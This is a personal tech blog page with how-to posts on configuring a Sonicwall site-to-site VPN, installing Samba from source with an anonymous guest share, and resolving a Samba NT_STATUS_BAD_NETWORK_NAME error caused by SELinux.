Sonicwall Site-To-Site VPN Setup

38 Comments

Setting up a Site-to-Site VPN is pretty simple in Sonicwall. Whether you have a dynamic IP connecting to a Static IP, or 2 static IP’s, its pretty simple to setup and you can have it up and running in no time. It’s as reliable as your internet connection and allows for quick failover to a backup IP address if one should go down. Here’s a quick write-up that will show you how to do it whether you have a 2 static addresses or 1 static and 1 dynamic address. Two Dynamic IP’s might require you to use Dynamic DNS or some other tool that automatically updates your IP address with a DNS server to make it appear static.  For this write-up, I am connecting a TZ100 router to an NSA240 router.

Quick Note: For a dynamic IP to static IP  site-to-site configuration,  use 0.0.0.0 as the “IPSec Primary Gateway Name or Address” on the static side because obviously the dynamic address will change.

1. To start on both Sonicwalls: Login to the Sonicwall, Go to VPN Settings page and write down both of your unique firewall ID. Lets call the routers Sonicwall1 and Sonicwall2 to keep things simple. For this writeup I’ve also kept it simple and put the Unique ID of 000000000001 and 000000000002, and IP addresses of 1.1.1.1 for Sonicwall1 and 2.2.2.2 for Sonicwall2 that way we know which one we’re talking about here. We will need it in a little bit. By default I believe this is the MAC address of your sonicwall. You might want to change this to something more secure. If not then leave it as the MAC address.

2. Now on Sonicwall one >> Click VPN Settings again >> and click Add Under VPN Policies.

3. Now we Enter our information on the General Tab.

a. For auth. method use IKE using Preshared Secret. For the name put whatever you want, I put ConnectionToSonicwall2.

b. Set the IPSec Primary Gateway Name or Address to that of Sonicwall 2. If your Sonicwall2 has a dynamic address instead of a static address then enter 0.0.0.0 as the IP address.

c. The Ipsec Secondary is the backup route to your Sonicwall2. This would be if you had 2 WAN connections on the Sonicwall2. If one of them went down it would automatically switch to the other line until the Primary becomes available again.

d. Enter your shared secret and then confirm it. This should be a pretty random set of numbers, letters, special characters, etc Write it down for now since you will need it when configuring Sonicwall2

e. For the local IKE ID: In the dropdown select “Sonicwall Identifier” and enter the Unique Firewall ID of Sonicwall1 (the one you’re currently on)

f. For the Peer IKE ID: In the dropdown select “SonicwallIdentifier” and enter the Unique Firewall ID of Sonicwall2. Here’s a screenshot

4. On the Network Tab

a. Under Local Networks choose local Network from the list, click “Lan Subnets.” If you would like the remote Sonicwall to access whatever is on your local network

b. Under Destination Networks click “Choose destination network from List” in which I add the Sonicwall2 network (2.2.2.0) by clicking “Create New Address Object” and entering the appropriate info. Here’s a screenshot of what I put for network 2:

5. On the proposals tab. You want to change the Exchange to “Aggressive Mode”, and I changed the encryption to AES-256. Although you can leave it at its default of 3DES. Everything else I left default. Here’s what looks like:

6. On the “Advanced” tab I checked “Enable Keep Alive” and “Enable Windows Networking ( Netbios) Broadcast and left everything else default. Click OK when you’re done.

7. Now we go to Sonicwall2, and basically enter the same settings reversed. So Login to Sonicwall2 and go to the VPN Settings page and click Add under VPN Policies.

8. Now we Enter our information on the General Tab.

a. For auth. method use IKE using Preshared Secret. For the name put whatever you want, I put ConnectionToSonicwall1.

b. Set the IPSec Primary Gateway Name or Address to that of Sonicwall 1. If your Sonicwall1 has a dynamic address instead of a static address then enter 0.0.0.0 as the IP address. My Sonicwall one has a static address of 1.1.1.1, so Enter that here

c. The Ipsec Secondary is the backup route to your Sonicwall1. This would be if you had 2 WAN connections on the Sonicwall1. If one of them went down it would automatically switch to the other line until the Primary becomes available again. So if I had a failover on Sonicwall one of 3.3.3.3 then I would enter it here.

d. Enter the shared secret that you entered when configuring Sonicwall1.

e. For the local IKE ID: In the dropdown select “Sonicwall Identifier” and enter the Unique Firewall ID of Sonicwall2 (the one you’re currently on)

f. For the Peer IKE ID: In the dropdown select “Sonicwall Identifier” and enter the Unique Firewall ID of Sonicwall1 that you copied earlier. Here’s a screenshot:

9. On the Network Tab

a. Under Local Networks choose local Network from the list, click “Lan Subnets.” If you would like the remote Sonicwall to access whatever is on your local network

b. Under Destination Networks click “Choose destination network from List” in which I add the Sonicwall2 network (2.2.2.0) by clicking “Create New Address Object” and entering the appropriate info. Here’s a screenshot of what I put for network 2:

10. On the proposals tab. You want to change the Exchange to “Aggressive Mode”, and I changed the encryption to AES-256. Although you can leave it at its default of 3DES. Everything else I left default. Here’s what looks like:

11. On the “Advanced” tab I checked “Enable Keep Alive” and “Enable Windows Networking ( Netbios) Broadcast and left everything else default. Click OK when you’re done.

That should be it. To see if it connected correctly, go back to the VPN settings page and see if it connected. There will be a “Green Light” to the right of Gateway under VPN Policies. If it does not connect then you may want to go the the Logs menu and under the filter category select VPN IKE to filter out only your VPN traffic. On both routers it will give you the reason it is not connecting, which can be cryptic.  However, there are plenty of info on the errors you may receive if you Google. Before pulling your hair out, Go back and double check your settings to make sure that they match in areas like IP Address, Preshared Secrets, Sonicwall Identifiers, and the Proposals Tab. Also make sure that “Enable VPN” is checked on the VPN Settings page and make sure that “Enable” is checked on the VPN settings page next to your VPN policy or else it will not try to connect.

Advertisements

Samba Install from Source and allow anonymous access from Windows

2 Comments

I needed to have an anonymous share setup for access by some Windows workstations on a secure network. The key to this is “security = share” in the global config of the smb.conf file, because “security = user” always prompted for a windows password no matter what I did even if I added the user using smbpasswd -a. Hopefully this will get you up and running with samba in no time.

INSTALL FROM SOURCE
I installed Samba from source by doing the following:

#wget http://www.samba.org/samba/ftp/samba-latest.tar.gz
#tar xvzf samba-latest.tar.gz
#cd samba-3.5.7 (or whatever version is the latest)
#cd source3
# ./configure –with-smbmount –with-ads –with-ldap

(if you get configure: error: ldap.h is needed for LDAP support
You need the openldap-devel package for ldap.h (yum –y install openldap-devel)

#make install

This creates directories in /usr/local/samba

To start Samba
/usr/local/samba/sbin/smbd –D
/usr/local/samba/sbin/nmbd –D

It installs all the files in /usr/local/samba by default.
The smb.conf needs to be in /usr/local/samba/lib.
Other files like smbclient and smbstatus are in the bin directory.

To start it automatically at startup edit the /etc/rc.d/rc.local file and enter the following at the end:
echo “Starting smbd…”
/usr/local/samba/sbin/smbd -D
echo “Starting nmbd…”
/usr/local/samba/sbin/nmbd -D

Here’s a simple smb.conf I have setup for sharing the /tmp directory. I grabbed part of it from an example in the untarred and unzipped directory I created above after downloading samba from samba.org. Just do a “find /root -name smb.conf*” to find example samba config files and copy it over to the /usr/local/samba/lib directory and modify it to suit your needs.

[global]
workgroup = SAMBA
security = share
debug level = 5

[cd1]
path = /mnt/cd1
public = yes

[cd2]
path = /mnt/cd2
public = yes

[media]
path = /media
public = yes

[tmp]
path = /tmp
guest only = yes
public = yes
read only = no

A good resource is here.

I also was having a problem connecting at first to the share from linux and windows. This was because of SELINUX. You need to allow smb if you have this installed. I have a writeup on this here:

You should look into setting up domain security or something more secure than share security, for this writing, if you needed something quick and dirty this should work.

Another thing you may need to do is to enable samba in your IPTables if your firewall is blocking ports 137-139. Here’s the entries in my iptables (/etc/sysconfig/iptables)to allow this.

-A INPUT -m state –state NEW -m udp -p udp –dport 137 -j ACCEPT
-A INPUT -m state –state NEW -m udp -p udp –dport 138 -j ACCEPT
-A INPUT -m state –state NEW -m tcp -p tcp –dport 139 -j ACCEPT
-A INPUT -m state –state NEW -m tcp -p tcp –dport 445 -j ACCEPT

Hope this helps someone out.

Samba SELinux NT_STATUS_BAD_NETWORK_NAME

2 Comments

When configuring a Samba server on a linux box, anytime that I tried to connect via an smbclient, i would get the following error

tree connect failed: NT_STATUS_BAD_NETWORK_NAME

further looking at /var/log/messages revealed that this was being caused by SELinux
setroubleshoot: SELinux is preventing /usr/sbin/smbd “name_connect” access on . For complete SELinux messages. run sealert -l 97453258-27dd-4980-a295-efb825ce95ca

To get around this I ran the following command to configure SELinux to allow Samba connections.

This lists available Samba options
# getsebool -a |grep samba
samba_create_home_dirs –> on
samba_domain_controller –> off
samba_enable_home_dirs –> off
samba_export_all_ro –> off
samba_export_all_rw –> off
samba_run_unconfined –> off
samba_share_fusefs –> off
samba_share_nfs –> off
use_samba_home_dirs –> off
virt_use_samba –> off

To turn these on and off run a command like the following: The -P flag I believe allows this to survive a reboot
# setsebool -P samba_export_all_rw on

The above command allowed me to connect to this share and get rid of that error.